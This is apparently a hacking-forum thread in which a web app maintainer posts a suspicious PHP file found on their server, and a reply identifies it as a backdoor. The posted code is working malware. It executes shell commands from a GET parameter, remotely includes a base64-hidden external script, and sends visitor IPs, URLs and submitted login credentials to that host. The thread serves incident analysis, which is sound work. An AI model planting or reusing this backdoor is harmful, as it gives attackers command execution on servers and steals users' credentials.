Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Need help decyphering

  1. Home
  2. Forum
  3. Hacking in general
  4. Need help decyphering

ghost's Avatar

ghost

0 0

I just stumbled across a couple of php files on the root of the web app I maintain where I work. Nobody knows how they got up there, but they look very sketchy, here is the source:

here's the other:

error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>```

Very worried and cannot decipher the code ourselves, although we do get the gist of the severity of "system($_GET["a3kfj39fsj2"])" seems like they're trying to execute commands using get args?  I don't know but I would very much appreciate some professional insights.

ghost's Avatar

ghost

0 0

looks abit like a backdoor… the system($_GET["a3kfj39fsj2"]) bit looks like a backdoor to execute commands.

and the aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9 bit decodes to: http://bis.iframe.ru/master.php?r_addr= and i think it sends all the info about your server to that site.

looks very dodgey to me… maybe you should delete it.